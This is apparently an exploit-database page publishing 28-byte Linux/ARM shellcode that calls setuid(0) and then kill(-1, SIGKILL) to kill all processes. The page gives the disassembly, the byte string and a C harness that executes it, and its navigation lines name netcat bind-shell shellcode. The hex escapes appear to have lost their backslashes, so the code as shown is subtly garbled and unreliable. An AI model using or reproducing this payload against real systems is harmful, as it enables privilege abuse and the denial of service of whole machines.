[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
# Published : 2010-06-29
# Author :
# Previous Title : Linux/x86 - netcat bindshell port 6666 - 69 bytes
# Next Title : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
/*
Title: Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes
(Kill all processes)
Date: 2010-06-29
Tested: ARM926EJ-S rev 5 (v5l)
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
8054: e28f3001 add r3, pc, #1 ; 0x1
8058: e12fff13 bx r3
805c: 1b24 subs r4, r4, r4
805e: 1c20 adds r0, r4, #0
8060: 2717 movs r7, #23
8062: df01 svc 1
8064: 1a92 subs r2, r2, r2
8066: 1c10 adds r0, r2, #0
8068: 3801 subs r0, #1
806a: 2109 movs r1, #9
806c: 2725 movs r7, #37
806e: df01 svc 1
*/
#include <stdio.h>
/* kill all processes without setuid(0) - 20 bytes */
// char *SC = "x01x30x8fxe2"
// "x13xffx2fxe1"
// "x92x1ax10x1c"
// "x01x38x09x21"
// "x25x27x01xdf";
/* kill all processes with setuid(0) - 28 byes */
char *SC = "x01x30x8fxe2"
"x13xffx2fxe1"
"x24x1bx20x1c"
"x17x27x01xdf"
"x92x1ax10x1c"
"x01x38x09x21"
"x25x27x01xdf";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}